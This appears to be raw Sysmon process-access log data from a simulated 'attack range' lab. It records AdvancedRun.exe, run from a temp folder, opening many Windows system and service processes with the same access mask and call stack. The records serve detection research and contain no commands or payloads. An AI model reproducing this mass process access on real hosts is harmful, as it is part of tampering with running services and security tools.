20:08:57.660{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004067470Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.660{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067469Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.660{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004067468Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.653{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067439Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.653{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067438Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.653{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067437Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.653{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067436Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.652{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067435Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.652{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067434Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.652{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004067433Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.652{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004067432Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.651{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004067431Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.651{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004067430Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.651{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004067429Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.651{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004067428Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.651{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000004067427Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:08:57.651{834264DD-12D9-61EB-4608-000000002702}30565240C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000004067426Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
